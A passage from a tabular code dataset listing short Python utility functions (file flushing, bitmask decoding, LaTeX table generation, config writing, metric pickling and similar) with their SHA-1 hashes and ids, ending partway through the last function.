content
stringlengths 35
416k
| sha1
stringlengths 40
40
| id
int64 0
710k
|
|---|---|---|
def fileflush(filed, residue, end=False):
    """
    Flush a file descriptor and collect any newly appended complete lines.
    @params:
        `filed`  : The file handler (must support flush/seek/tell/readlines)
        `residue`: The remaining (unterminated) content of the last flush
        `end`    : The file ends? Default: `False`
    @returns:
        A `(lines, residue)` tuple: the complete lines read, and the
        trailing partial line to carry into the next call.
    """
    filed.flush()
    # OSX cannot tell the pointer automatically; re-seek to refresh it
    filed.seek(filed.tell())
    lines = filed.readlines() or []
    if lines:
        # Prepend the leftover from the previous call to the first line
        lines[0] = residue + lines[0]
        # An unterminated last line becomes the new residue
        residue = '' if lines[-1].endswith('\n') else lines.pop(-1)
    # This flush-residue-at-EOF step was duplicated verbatim in both the
    # `if` and `elif` branches of the original; hoisted here once, it is
    # equivalent for both the lines-read and no-lines-read cases.
    if residue and end:
        lines.append(residue + '\n')
        residue = ''
    return lines, residue
|
03c0309324e0ed2db86c03967678299a6686be17
| 28,746
|
import re
def _ParsePercent(fixed_or_percent_str):
"""Retrieves percent value from string."""
if re.match(r'^\d+%$', fixed_or_percent_str):
percent = int(fixed_or_percent_str[:-1])
return percent
return None
|
360741f7cb179d76e2c3bc89eb263d009734baeb
| 28,747
|
import importlib
def resolve(name):
    """Convert a dotted module path to an object.

    This is used to do the importing, when :class:`Tool` resolves
    the path to a command implementation. Non-string inputs are returned
    unchanged; a bare (dot-free) name is looked up in this module's globals.
    """
    if not isinstance(name, str):
        return name
    module_path, dot, attr = name.rpartition('.')
    if dot and module_path:
        # Split at the last dot: everything before is the module path.
        return getattr(importlib.import_module(module_path), attr)
    return globals()[name]
|
f133173377cac7b2ad3c3ed3d27b55c4c67bb8f2
| 28,748
|
def firm_size_quintile(firm_mcap, mcap_list):
    """
    Quintile number (1-5) of firm_mcap within sorted mcap_list.
    Returns INTEGER.
    """
    position = mcap_list.index(firm_mcap)
    n = len(mcap_list)
    # Each quintile q covers indices below (n * q) // 5; the first boundary
    # that exceeds the firm's position determines its quintile.
    for quintile in range(1, 5):
        if position < (n * quintile) // 5:
            return quintile
    return 5
|
a084eb70fc9385443a4dd49a05c563bf4699b076
| 28,749
|
import math
def debitmask(input_int, num_bits=False):
    """
    | takes a bitmask and returns a list of which bits are switched.
    | reads from left to right e.g. 2 = [0, 1] not [1, 0].
    """
    if num_bits == False and input_int > 0:
        # Smallest bit width that can represent input_int.
        num_bits = int(math.ceil(math.log(input_int + 1, 2)))
    elif input_int == 0:
        return [0]
    remaining = input_int
    bits = [0] * num_bits
    # Peel off the highest representable bit first.
    for position in range(num_bits - 1, -1, -1):
        if remaining >= 2 ** position:
            bits[position] = 1
            remaining -= 2 ** position
    return bits
|
68541f3b5cd14a92b44c0445e1f2856567bdb0be
| 28,750
|
import pkg_resources
def gobbli_version() -> str:
    """
    Returns:
        The version of gobbli installed.
    """
    # Reads setuptools' installed-distribution metadata; raises
    # pkg_resources.DistributionNotFound if gobbli is not installed.
    return pkg_resources.get_distribution("gobbli").version
|
2357e1fcca33e97fe970a42c20593d31c9a887c8
| 28,751
|
def patch_basic_types(basic_types, inp_version):
    """
    Patch the _basic_types entry to correct ambigouities.

    :param basic_types: dict of basic type definitions (modified in-place)
    :param inp_version: input version converted to tuple of ints
    :returns: the patched ``basic_types`` dict
    :raises ValueError: if a type to patch does not already exist
    """
    if inp_version >= (0, 33):
        #After this version the issue was solved
        return basic_types
    CHANGE_TYPES = {
        (0, 32): {
            'add': {
                'KPointType': {
                    'base_types': ['float_expression'],
                    'length': 3
                },
            }
        },
        (0, 28): {
            'add': {
                'AtomPosType': {
                    'base_types': ['float_expression'],
                    'length': 3
                },
                'LatticeParameterType': {
                    'base_types': ['float_expression'],
                    'length': 1
                },
                'SpecialPointType': {
                    'base_types': ['float_expression'],
                    'length': 3
                }
            }
        },
    }
    # Accumulate additions/removals from oldest to newest applicable version.
    accumulated = {}
    for changed_version in sorted(CHANGE_TYPES):
        if inp_version < changed_version:
            continue
        entry = CHANGE_TYPES[changed_version]
        accumulated.update(entry.get('add', {}))
        for removed_name in entry.get('remove', set()):
            accumulated.pop(removed_name, None)
    for type_name, definition in accumulated.items():
        if type_name not in basic_types:
            raise ValueError(f'patch_basic_types failed. Type {type_name} does not exist')
        basic_types[type_name] = definition
    return basic_types
|
d20ab88119bea457f799e84448875846dcc3d077
| 28,752
|
def render_compiled(compiled, variables):
    """Render from compiled template with interpolated variables."""
    # The compiled pair is (callable template, partials mapping).
    template_fn, partial_map = compiled
    return template_fn(variables, partials=partial_map)
|
3c13acf96ac3b59bcd5c2a1f3f3dbc19fd210c80
| 28,753
|
def requirements(section=None):
    """Helper for loading dependencies from requirements files.

    With no section, reads ``requirements.txt``; otherwise reads
    ``requirements-<section>.txt``. Returns the stripped lines.
    """
    suffix = "" if section is None else f"-{section}"
    with open(f"requirements{suffix}.txt") as handle:
        return [entry.strip() for entry in handle]
|
2e4b7f9f4d8c8d0cd3cfa749f03785d2bba6a26b
| 28,754
|
def route(rule, **options):
    """Decorator that records a URL rule on the decorated method.

    Like :meth:`Flask.route` but for nereid: instead of requiring an existing
    nereid application or blueprint instance, it appends ``(rule, options)``
    to a ``_url_rules`` list attribute on the function, to be collected later.

    .. versionadded:: 3.0.7.0

    .. code-block:: python
        :emphasize-lines: 1,7

        from nereid import route
        class Product:
            __name__ = 'product.product'
            @classmethod
            @route('/product/<uri>')
            def render_product(cls, uri):
                ...
                return 'Product Information'
    """
    def decorator(func):
        rules = getattr(func, '_url_rules', None)
        if rules is None:
            rules = []
            func._url_rules = rules
        rules.append((rule, options))
        return func
    return decorator
|
c7f33af4e8fa10090e5b6a90532707fd59688885
| 28,755
|
def remap_column_names(data_names, name_map):
    """Remap data array column names using a dictionary map.

    Each name present as a key in ``name_map`` is replaced by its mapped
    value; all other names pass through unchanged.

    Args:
        data_names (str, nx1 tuple): list of column names taken from structured np array
        name_map (dict): dictionary with keys matching history file column names to be
            replaced by the corresponding values

    Returns:
        (str, nx1 tuple): New list of column names
    """
    remapped = []
    for original_name in data_names:
        # dict.get falls back to the current name when it has no mapping
        remapped.append(name_map.get(original_name, original_name))
    return tuple(remapped)
|
4863d8b9ce1986df4bd85f543014208428ea85cb
| 28,756
|
def tablefragment(m,signalRegions,skiplist,chanStr,showPercent,label="",caption=""):
    """
    main function to transfer the set of numbers/names (=m provided by SysTable) into a LaTeX table
    @param m Set of numbers/names provided by SysTable
    @param signalRegions List of channels/regions used
    @param skiplist List of parameters/members of 'm' to be skipped (such as 'sqrtnobsa') when showing per-systematic errors
    @param chanStr String of all channels used, to be used in label of table
    @param showPercent Boolean deciding whether to show percentage for each systematic
    @param label LaTeX label for the table; autogenerated from chanStr when empty
    @param caption Table caption; a default description is used when empty
    @returns The assembled LaTeX table as a single string
    """
    tableline = ''
    tableline += '''
\\begin{table}
\\centering
\\small
\\begin{tabular*}{\\textwidth}{@{\\extracolsep{\\fill}}l'''
    """
    print the region names
    """
    # one centered column per region
    for region in signalRegions:
        tableline += "c"
    tableline += '''}
\\toprule
\\textbf{Uncertainty of channel} '''
    """
    print the total fitted (after fit) number of events
    """
    for region in signalRegions:
        tableline += " & " + region.replace('_',r'\_') + " "
    tableline += ''' \\\\
\\midrule
%%'''
    tableline += '''
Total background expectation '''
    for region in signalRegions:
        tableline += " & $" + str("%.2f" %m[region]['nfitted']) + "$ "
    tableline += '''\\\\
%%'''
    tableline += ''' \\\\
\\midrule
%%'''
    """
    print sqrt(N_obs) - for comparison with total systematic
    """
    tableline += '''
Total statistical $(\\sqrt{N_{\\mathrm{exp}}})$ '''
    for region in signalRegions:
        tableline += " & $\\pm " + str("%.2f" %m[region]['sqrtnfitted']) + "$ "
    tableline += '''\\\\
%%'''
    """
    print total systematic uncertainty
    """
    tableline += '''
Total background systematic '''
    for region in signalRegions:
        # guard against division by zero for regions with no fitted events
        percentage = (
            m[region]["totsyserr"] / m[region]["nfitted"] * 100.0
            if m[region]["nfitted"] > 0
            else 0
        )
        tableline += (
            " & $\\pm "
            + str("%.2f" % m[region]["totsyserr"])
            + r"\ ["
            + str("%.2f" % percentage)
            + "\\%] $ "
        )
    tableline += ''' \\\\
\\midrule
%%'''
    """
    print systematic uncertainty per floated parameter (or set of parameters, if requested)
    """
    # sort parameters by their impact in the first region, largest first
    d = m[signalRegions[0]]
    m_listofkeys = sorted(iter(d.keys()), key=lambda k: d[k], reverse=True)
    for name in m_listofkeys:
        if name not in skiplist:
            # strip the 'syserr_' prefix and LaTeX-escape underscores
            printname = name
            printname = printname.replace('syserr_','')
            printname = printname.replace('_',r'\_')
            for index,region in enumerate(signalRegions):
                if index == 0:
                    tableline += "\n" + printname + " "
                if not showPercent:
                    tableline += " & $\\pm " + str("%.2f" %m[region][name]) + "$ "
                else:
                    percentage = m[region][name]/m[region]['nfitted'] * 100.0 if m[region]['nfitted']>0. else 0.
                    # extra decimal place for sub-percent contributions
                    if percentage <1:
                        tableline += " & $\\pm " + str("%.2f" %m[region][name]) + r"\ [" + str("%.2f" %percentage) + "\\%] $ "
                    else:
                        tableline += " & $\\pm " + str("%.2f" %m[region][name]) + r"\ [" + str("%.1f" %percentage) + "\\%] $ "
                if index == len(signalRegions)-1:
                    tableline += '''\\\\
%%'''
    """
    print table end with default Caption and Label
    """
    if caption =="":
        caption="""Breakdown of the dominant systematic uncertainties on background estimates in the various signal regions.
Note that the individual uncertainties can be correlated, and do not necessarily add up quadratically to
the total background uncertainty. The percentages show the size of the uncertainty relative to the total expected background."""
    if label =="":
        label="table.results.bkgestimate.uncertainties.%s"%(chanStr)
    tableline += """
\\bottomrule
\\end{tabular*}
\\caption{"""+caption+"""}
\\label{"""+label+r"""}
\end{table}"""
    return tableline
|
cdb7165000aef16e718c3895a0dea45abe8764a4
| 28,757
|
def reference_to_schema_name(reference_name):
    """This function will eventually identify the schema associated with `reference_name`
    unless replaced by similar functionality in the models package.

    Returns None meaning "default/core schema"
    """
    # Placeholder implementation: always reports the default/core schema.
    return None
|
08acdad8df4baef2ed44c29b7974a5619038a2e1
| 28,758
|
def get_key(row, columns, numeric_column):
    """Build the sort key for ``row``.

    Returns the values of ``columns`` taken from ``row``, converted to int
    when ``numeric_column`` is truthy.
    """
    if numeric_column:
        return [int(row[col]) for col in columns]
    return [row[col] for col in columns]
|
ba03215956bbd3adb0acd9d086875c2978e48c05
| 28,759
|
def ha_write_config_file(config, path):
    """Write all activities and device commands of a Harmony hub config to a text file.

    Args:
        config (dict): Dictionary object containing configuration information obtained from function ha_get_config
        path (str): Full path to output file

    Returns:
        True
    """
    with open(path, 'w+', encoding='utf-8') as out:
        out.write('Activities\n')
        for activity in config['activity']:
            out.write(f" {activity['id']} - {activity['label']}\n")
        out.write('\nDevice Commands\n')
        for device in config['device']:
            out.write(f" {device['id']} - {device['label']}\n")
            for group in device['controlGroup']:
                for func in group['function']:
                    out.write(f" {func['name']}\n")
    return True
|
7733430b0b64dc04cb398fc177e103e3d64d19b6
| 28,761
|
def radical(n, *args, **kwds):
    """
    Return the product of the prime divisors of n.

    This calls ``n.radical(*args, **kwds)``. If that doesn't work, it
    does ``n.factor(*args, **kwds)`` and returns the product of the prime
    factors in the resulting factorization.

    EXAMPLES::

        sage: radical(2 * 3^2 * 5^5)
        30
        sage: radical(0)
        Traceback (most recent call last):
        ...
        ArithmeticError: Radical of 0 not defined.
        sage: K.<i> = QuadraticField(-1)
        sage: radical(K(2))
        i + 1

    The next example shows how to compute the radical of a number,
    assuming no prime > 100000 has exponent > 1 in the factorization::

        sage: n = 2^1000-1; n / radical(n, limit=100000)
        125
    """
    try:
        # Preferred path: the element type knows its own radical.
        return n.radical(*args, **kwds)
    except AttributeError:
        # Fallback: factor and take the product of the distinct prime factors.
        return n.factor(*args, **kwds).radical_value()
|
846549ba03bcc38cd25a49cb5a2bd51c16cc2e54
| 28,762
|
import os
def define_preview(define_input, define_along, define_across):
    """
    Define information for previewing an interpolation run. Fill the relevant
    dictionaries and pass it to the automatic routines. Full explanation of options
    is also given in `create_inputfile.py`, block 5.

    :param define_input: dict filled in-place with grid/limits/IO settings
    :param define_along: dict filled in-place with along-track resolution settings
    :param define_across: dict filled in-place with across-grid resolution settings
    :returns: the three dicts, filled in
    """
    # ==================================================================================
    # BLOCK 1: Grid and limits for subgrid
    # ==================================================================================
    # The path to the grid to be used by BASTA
    # NOTE(review): requires the BASTADIR environment variable — KeyError if unset
    define_input["gridfile"] = os.path.join(
        os.environ["BASTADIR"], "grids", "Garstec_16CygA.hdf5"
    )
    # If the inputted grid is BaSTI isochrones, specify the science case. See
    # `create_inputfile.py` block 2c for available cases by standard
    # define_input["odea"] = (0, 0, 0, 0)
    # Construction of interpolated grid(s). There are to options:
    # - "bystar" for an interpolated grid for each star in the input file
    # - "encompass" for a single grid spanning all of the stars
    define_input["construction"] = "bystar"
    # Define limits of subgrid to be interpolated, within the full grid.
    # Primarely to avoid spending a large amount of time interpolating in regions that
    # are not close to the fitted star(s).
    define_input["limits"] = {
        "Teff": {"abstol": 150},
        "FeH": {"abstol": 0.2},
        "dnufit": {"abstol": 8},
    }
    # Take ascii-file input in order to do "abstol" and "sigmacut" in limits
    # If no limits are given in terms of "abstol" or "sigmacut" this can be ignored
    define_input["asciifile"] = os.path.join("data", "16CygA.ascii")
    define_input["params"] = (
        "starid",
        "RA",
        "DEC",
        "numax",
        "numax_err",
        "dnu",
        "dnu_err",
        "Teff",
        "Teff_err",
        "FeH",
        "FeH_err",
        "logg",
        "logg_err",
    )
    # Output-path shared by both preview figures below
    outpath = os.path.join("output", "preview_interp_MS")
    # ==================================================================================
    # BLOCK 2: Controls for along interpolation
    # ==================================================================================
    # To compare the current resolution along a track/isochrone with an inputted value,
    # switch this option on
    along_interpolation = True
    if along_interpolation:
        # Resolution parameters to preview current resolution for.
        # Input any list of parameters, "freqs" for viewing the spacing in the l=0 modes
        # in the models. Compares to the inputted value.
        define_along["resolution"] = {
            "freqs": 0.5,
            # "dnufit": 0.04,
            # "age": 20,
        }
        # Location, name and format of the outputted figure (histogram)
        # Use either .png (fast) or .pdf (high resolution) format, .png by default
        define_along["figurename"] = os.path.join(
            outpath, "interp_preview_along_resolution.pdf"
        )
    # ==================================================================================
    # BLOCK 3: Controls for across interpolation
    # ==================================================================================
    # To compare the current gridresolution with what would be obtained given the input
    across_interpolation = True
    if across_interpolation:
        # Definition of the increase in resolution. "scale" for Sobol sampling with the
        # given multiplicative increase in the number of tracks/isochrones. For
        # Cartesian sampling, define the increase in number of tracks between current
        # points, e.g. "FeHini": 2 will result three times the number of tracks
        define_across["resolution"] = {
            "scale": 6,
        }
        # Location, name and format of the outputted figure (histogram)
        # Use either .png (fast) or .pdf (high resolution) format, .png by default
        define_across["figurename"] = os.path.join(
            outpath, "interp_preview_across_resolution.pdf"
        )
    # Done! Nothing more to specify.
    return define_input, define_along, define_across
|
888bd2456f8f7c5c2fa83f7407aa401557661090
| 28,763
|
def nested_conditionals(conditional_A, conditional_B, conditional_C, conditional_D):
    """
    Guard-clause version of the verbose test function: True only when all
    four conditionals are truthy, False otherwise.
    """
    if not conditional_A:
        return False
    if not conditional_B:
        return False
    return bool(conditional_C and conditional_D)
|
1003f0d1b73f84d0dadd26ba9052556787038214
| 28,765
|
import requests
def count():
    """
    Returns the number of songs on chorus.fightthe.pw

    NOTE(review): despite the name, this returns the raw ``requests``
    response from the count endpoint, not a parsed number — callers must
    decode it themselves.
    """
    # Plain GET against the public API; no auth, timeout, or error handling.
    return requests.get(r'https://chorus.fightthe.pw/api/count')
|
40f4e77cda56db9567aa530fdcc4fc477227e8a9
| 28,766
|
import sys
import inspect
def call_prepare_arguments(func, parser, sysargs=None):
    """Call a prepare_arguments function with the correct number of parameters.

    The ``prepare_arguments`` function of a verb can either take one parameter,
    ``parser``, or two parameters ``parser`` and ``args``, where ``args`` are
    the current arguments being processed.

    :param func: Callable ``prepare_arguments`` function.
    :type func: Callable
    :param parser: parser which is always passed to the function
    :type parser: :py:class:`argparse.ArgumentParser`
    :param sysargs: arguments to optionally pass to the function, if needed
    :type sysargs: list
    :returns: return value of function or the parser if the function
        returns None.
    :rtype: :py:class:`argparse.ArgumentParser`
    :raises: ValueError if a function with the wrong number of parameters
        is given
    """
    func_args = [parser]
    # If the provided function takes two arguments and args were given
    # also give the args to the function
    # Remove the following if condition and keep else condition once Xenial is
    # dropped (getargspec was removed from Python 3's inspect API surface)
    if sys.version_info[0] < 3:
        arguments, _, _, defaults = inspect.getargspec(func)
    else:
        arguments, _, _, defaults, _, _, _ = inspect.getfullargspec(func)
    # Bound methods expose 'self' as the first argument; ignore it.
    if arguments[0] == 'self':
        del arguments[0]
    # Only the required (non-defaulted) parameters count toward the 1-or-2 rule.
    if defaults:
        arguments = arguments[:-len(defaults)]
    if len(arguments) not in [1, 2]:
        # Remove the following if condition once Xenial is dropped
        if sys.version_info[0] < 3:
            raise ValueError("Given function '{0}' must have one or two "
                             "parameters (excluding self), but got '{1}' "
                             "parameters: '{2}'"
                             .format(func.__name__,
                                     len(arguments),
                                     ', '.join(inspect.getargspec(func)[0])))
        raise ValueError("Given function '{0}' must have one or two "
                         "parameters (excluding self), but got '{1}' "
                         "parameters: '{2}'"
                         .format(func.__name__,
                                 len(arguments),
                                 ', '.join(inspect.getfullargspec(func)[0])))
    if len(arguments) == 2:
        func_args.append(sysargs or [])
    return func(*func_args) or parser
|
ebf598acf3acf0364f8b07b115863736497ee354
| 28,767
|
import os
def is_under_tmux() -> bool:
    """
    Return `True` if running under tmux.
    """
    # tmux exports $TMUX inside its sessions; whitespace-only counts as unset.
    tmux_var = os.getenv("TMUX", "")
    return bool(tmux_var.strip())
|
51683e5333b02561b98913f8b6dd4c206a768549
| 28,768
|
def findPeakCluster(index, build_list, df, peak_gap):
    """
    Find the members of a peak cluster starting from the peak with the
    smallest size (iterative equivalent of the recursive original).

    Parameters
    ----------
    index : int
        Index of df corresponding to the first peak of the cluster.
    build_list : list
        List of indexes of peaks already assigned to the cluster
        (extended in-place).
    df : pandas.DataFrame
        Dataframe of cleaned GeneScan datasheet; must have a "Size" column.
    peak_gap : int
        User-supplied. A pair of peaks within peak_gap of each other is
        considered part of the same cluster.

    Returns
    -------
    list
        Deduplicated list of indexes of peaks in the cluster.
    """
    last_index = max(df.index)
    current = index
    # Walk forward while the next peak is within peak_gap of the current one.
    while current != last_index and \
            df.loc[current + 1, "Size"] - df.loc[current, "Size"] <= peak_gap:
        build_list += [current, current + 1]
        current += 1
    return list(set(build_list))
|
f808d67a234df45f117b653ca16890ce9c4e982e
| 28,769
|
import os
import dill
import inspect
import pickle
def pickle_custom_metrics(metrics, filename):
    """Pickle the metrics if there is callable in the list of metrics.

    Args:
        metrics (list): List of metrics (strings and/or callables)
        filename (str): Path to dump the pickled file

    Return:
        bool: True when at least one metric was callable (i.e. pickling
        was required), False otherwise.
    """
    # Detect whether any metric needs serialization at all.
    metric_callable = False
    for metric in metrics:
        if callable(metric):
            metric_callable = True
            break
    # Only serialize when needed, and never overwrite an existing dump.
    if metric_callable and not os.path.exists(filename):
        metric_names = []
        function_string = []
        function_path = []
        count = 0
        for metric in metrics:
            if isinstance(metric, str):
                metric_names.append(metric)
            elif callable(metric):
                # Callables are recorded by position and dill-serialized;
                # their source directories are kept for later re-import.
                metric_names.append(count)
                function_string.append(dill.dumps(metric, recurse=True))
                if not os.path.dirname(inspect.getabsfile(metric)) in function_path:
                    function_path.append(os.path.dirname(inspect.getabsfile(metric)))
            count += 1
        metric_data = {'names': metric_names,
                       'function_string': function_string,
                       'function_path': function_path}
        with open(filename, 'wb') as fid:
            pickle.dump(metric_data, fid)
    return metric_callable
|
c34179e905e8a2184c4fdddd2152d6f0e012d7b8
| 28,770
|
def clamp(low, high, x):
    """
    Clamps a number to the interval [low, high]
    """
    if x < low:
        return low
    if x > high:
        return high
    return x
|
1393af569f83369a7aa0c22cfaded9ed8e9d112a
| 28,771
|
import os
def get_command_output(cmd: str, redirect_error: bool = False) -> str:
    """Return the command line output of a command.

    Args:
        cmd: Shell command to run.
        redirect_error: When True, append ``2> /dev/null`` so stderr is dropped.

    Returns:
        The command's stdout as a string, or "" if running it failed.
    """
    suffix = " 2> /dev/null" if redirect_error else ""
    try:
        with os.popen(cmd + suffix) as stream:
            return stream.read()
    # Fix: the original bare ``except:`` also swallowed KeyboardInterrupt and
    # SystemExit; keep the best-effort "" contract but let those propagate.
    except Exception:
        return ""
|
44a89f88f4fd6d2778d4bbc0cf305e5a4c82871d
| 28,772
|
def valid(neighbor, rows, columns):
    """Find out if neighbor cell is valid.

    Args:
        neighbor (List of integers): Neighboring cell position
        rows (int): Number of rows on the board
        columns (int): Number of columns on the board

    Returns:
        [boolean]: True if valid, False otherwise
    """
    row_idx, col_idx = neighbor[0], neighbor[1]
    # Both coordinates must lie inside the board's bounds.
    return 0 <= row_idx < rows and 0 <= col_idx < columns
|
5f832c2a8b06aa98e378c1614078e36f8a9fc2e5
| 28,773
|
import functools
import warnings
def deprecated(func, replacement="", message="{name} is deprecated."):
    """Decorator that marks ``func`` as deprecated.

    Emits a DeprecationWarning — formatted with the function name, plus an
    optional replacement hint — every time the wrapped function is called.
    """
    warn_text = message.format(name=func.__name__)
    if replacement != "":
        warn_text = f"{warn_text} {replacement}"
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        warnings.warn(warn_text,
                      category=DeprecationWarning,
                      stacklevel=2)
        return func(*args, **kwargs)
    return wrapper
|
80669a19fc070f2c2aa8bfb1e9067cc65512dec3
| 28,774
|
def itb(num: int, length: int):
    """
    Converts integer to bit array (big-endian, fixed width).

    Generalized from the original, which only supported lengths 13, 16, 17
    and 23 (and silently returned None for any other width). Values outside
    the representable range are clamped to [0, 2**length - 1].

    :param num: number to convert to bits
    :param length: length of bits to convert to
    :return: bit array (list of ints, most significant bit first)
    """
    # Clamp into the representable range, then truncate to int
    # (matching the original's clamp-then-int order).
    num = int(min(max(num, 0), 2 ** length - 1))
    # A dynamic format spec replaces the hard-coded '{0:013b}' variants.
    return [int(bit) for bit in format(num, '0{}b'.format(length))]
|
b9866a9765c38ada3fe81d50ba4224d5823af180
| 28,775
|
def get_sample_name(filename):
    """Extract sample name from filename.

    Takes the final '/'-separated path component and drops everything
    from the first '.' onward.
    """
    basename = filename.rsplit('/', 1)[-1]
    return basename.partition('.')[0]
|
378dd429f0796930bfeb24e3a8fa51bcde32fb60
| 28,777
|
import re
def getTags(text):
    """Grep the ``key = value`` tags in text and return them as a dict.

    Expected keys include: 'Name' 'Version' 'Type' 'Author' 'Origin'
    'Category' 'ID' 'URL' 'Desc' 'Date' 'Flags' 'RefCount' 'Signature'
    'MASFile' 'BaseSignature' 'MinVersion'. Example line: Name=134_JUDD

    :param text: iterable of lines
    :return: dict mapping tag names to their values
    """
    tags = {}
    for line in text:
        m = re.match(r'(.*) *= *(.*)', line)
        if m:
            # BUG FIX: with the greedy pattern above, ' *' can match empty so
            # group(1) keeps any spaces before '=' (e.g. key 'Name ' from
            # 'Name = x'); strip them so tags['Name'] works regardless of
            # spacing around '='.
            tags[m.group(1).rstrip()] = m.group(2)
            #print(m.group(1), m.group(2))
    return tags
|
92a536b36e0c9ea78bef1ffd97ff69d4e448a0ac
| 28,778
|
def _filter_none_elems_from_dict(dict_: dict):
""" Given a dict (call it m), returns a new dict which contains all the
non-null (non-none) elements of m.
Args:
dict_: The dict to return the non-null elements of.
Returns:
A new dict with all the non-null elements of <dict_>.
"""
return {k: v for k, v in dict_.items() if v is not None}
|
a8b95a1e9f36e90b5c96a4e95b05fcba069d4a93
| 28,779
|
def _event_QComboBox(self):
    """
    Return QCombobox change event signal.
    """
    # assumes self is (or wraps) a QComboBox exposing the Qt
    # currentIndexChanged signal — TODO confirm against caller
    return self.currentIndexChanged
|
f3d220db6642f065b3c2201bab9614fa8bde288b
| 28,781
|
def range_filter(field, gt=None, gte=None, lt=None, lte=None):
    """
    Build a range-query clause for ``field``.

    You must specify either gt (greater than) or gte (greater than or
    equal to) and either lt or lte; unset bounds are omitted.
    """
    bounds = {}
    for op, value in (('gt', gt), ('gte', gte), ('lt', lt), ('lte', lte)):
        if value is not None:
            bounds[op] = value
    return {"range": {field: bounds}}
|
08052a50335e8b98e32a64fb7fd2031eb9919e7e
| 28,782
|
def check_layout_layers(layout, layers):
    """
    Check the layer widget order matches the layers order in the layout

    Parameters
    ----------
    layout : QLayout
        Layout to test
    layers : napari.components.LayerList
        LayersList to compare to

    Returns
    ----------
    match : bool
        Boolean if layout matches layers
    """
    # Widgets appear in reverse layer order at the odd layout slots
    # (indices 2*i - 1 for i = len..1); each widget carries its layer.
    layers_layout = [
        layout.itemAt(2 * i - 1).widget().layer
        for i in range(len(layers), 0, -1)
    ]
    return layers_layout == list(layers)
|
7d5c3ed65e0588f430341345d6e0fb0856aacaeb
| 28,784
|
def isSignedOff(message):
    """
    Check whether a commit message contains a Signed-off-by tag.
    """
    return any(line.startswith('Signed-off-by') for line in message.splitlines())
|
79248d9438ac1fc1cbce18ae8af236f0960d42e2
| 28,785
|
def outsideprocess(func):
    """Annotation to mark a job function.

    Only functions marked with this annotation are accepted as jobs; the
    marker is a ``_outsideprocess`` attribute set on the function itself.
    """
    setattr(func, '_outsideprocess', True)
    return func
|
31848ee04170661ef319fcbbe54086c34c99f102
| 28,787
|
import logging
def create_portfolio(client, portfolio_conf, region):
    """
    To create the portfolio.

    :param client: client exposing ``create_portfolio`` — presumably an AWS
        Service Catalog boto3 client; verify against caller
    :param portfolio_conf: dict with 'Name', 'Description' and 'Provider' keys
    :param region: region name, used only in the log message
    :return: the ID of the newly created portfolio
    """
    response = client.create_portfolio(
        DisplayName=portfolio_conf['Name'],
        Description=portfolio_conf['Description'],
        ProviderName=portfolio_conf['Provider']
    )
    # The service returns the new portfolio's details, including its ID.
    portfolio_id = response['PortfolioDetail']['Id']
    logging.info("portfolio {} created in region {}".format(portfolio_conf['Name'], region))
    return portfolio_id
|
892f3742da9d3d17957a0b5ca688ae74caef3cc8
| 28,788
|
def num_to_list(integer):
    """One-hot encode ``integer`` into a length-3 list — a quasi inverse
    of list_to_num."""
    encoded = [0] * 3
    encoded[integer] = 1
    return encoded
|
d65fb981f6f1a3f759968424e8c833d86abd63da
| 28,789
|
def categorize_by_damage(hurricanes):
    """Categorize hurricanes by damage and return a dictionary.

    Bucket 0 holds unrecorded or zero damage; buckets 1-4 hold increasing
    damage bands; bucket 5 holds anything above the top band.
    """
    thresholds = {0: 0,
                  1: 100000000,
                  2: 1000000000,
                  3: 10000000000,
                  4: 50000000000}
    buckets = {0: [], 1: [], 2: [], 3: [], 4: [], 5: []}
    for name in hurricanes:
        record = hurricanes[name]
        damage = record['Damage']
        if damage == "Damages not recorded" or damage == thresholds[0]:
            buckets[0].append(record)
        elif damage > thresholds[0]:
            # First band whose upper bound covers the damage; else top bucket.
            band = 5
            for level in range(1, 5):
                if damage <= thresholds[level]:
                    band = level
                    break
            buckets[band].append(record)
    return buckets
|
be4371b983f34bc054e5bea94c3b9d1973272cc5
| 28,792
|
from typing import List
def check_numerics(numerics: List[int], min: int, max: int) -> List[int]:
    """Check that everything in the list is in bounds.

    Args:
        numerics: Values to validate; an empty list is trivially in bounds.
        min: Inclusive lower bound.
        max: Inclusive upper bound.

    Returns:
        The values sorted ascending.

    Raises:
        ValueError: If any value falls outside [min, max].
    """
    s = sorted(numerics)
    # Guard against the empty list: the original indexed s[0]/s[-1]
    # unconditionally and crashed with IndexError.
    if s and (s[0] < min or s[-1] > max):
        # ValueError subclasses Exception, so callers catching the original
        # generic Exception still work, with a more precise type.
        raise ValueError(
            f"Out of bounds numbers in list {numerics}, min: {min}, max: {max}"
        )
    return s
|
85588e099752167302220479244682e3129698d1
| 28,793
|
import requests
import sys
def consumer_is_healthy(burrow, consumer):
    """Return true if consumer is healthy.

    :param burrow: base URL of the Burrow monitoring API
    :param consumer: consumer group name to check

    NOTE(review): exits the whole process (exit code 1) when the consumer
    is unknown (non-200 response) instead of raising.
    """
    res = requests.get("{}/consumer/{}/status".format(burrow, consumer))
    if res.status_code != 200:
        print("Did not find consumer {}, aborting!".format(consumer))
        sys.exit(1)
    # The overall verdict is nested under status.status in the response JSON.
    all_good = res.json().get("status", {}).get("status", None) == "OK"
    if not all_good:
        print("Consumer {} is not healthy!".format(consumer))
    return all_good
|
e726878bd06a25eaea12a924e038b1f7179f1269
| 28,794
|
def read_file(file_path):
    """
    Reads input file.

    Args:
        file_path (str): path of input file.

    Returns:
        list: content of the file, one entry per line, with the file's
        surrounding whitespace stripped first.
    """
    with open(file_path, 'r') as handle:
        contents = handle.read()
    return contents.strip().split('\n')
|
27008dcbd9bd9336240e68c9514ae6170c18df78
| 28,795
|
def get_cache_backend(class_path, **kwargs):
    """Instantiate the cache backend named by a dotted string path,
    forwarding ``kwargs`` to its constructor."""
    # Split at the last dot: module path on the left, class name on the right.
    module_path, _, class_name = class_path.rpartition('.')
    module = __import__(module_path, fromlist=[class_name])
    backend_cls = getattr(module, class_name)
    return backend_cls(**kwargs)
|
133ff883f0705d2e7ef18f69253df33d1e1691d0
| 28,796
|
def get_attempt_data(all_gens):
    """
    Extracts the attempt data of succesful generations.

    all_gens - dict keyed by nodeID whose values are lists of
               (nodeID, createTime, attempts, (createID, sourceID, otherID, mhpSeq))

    :return: dict of dicts
        A dict with keys being nodeIDs and values being dictionaries of the
        form {Entanglement ID: Number of generation attempts}
    """
    gen_attempts = {}
    for node_id, node_gens in all_gens.items():
        for gen in node_gens:
            # The last three fields identify the entanglement attempt;
            # gen[2] is the attempt count.
            ent_key = "{}_{}_{}".format(*gen[-3:])
            gen_attempts.setdefault(node_id, {})[ent_key] = gen[2]
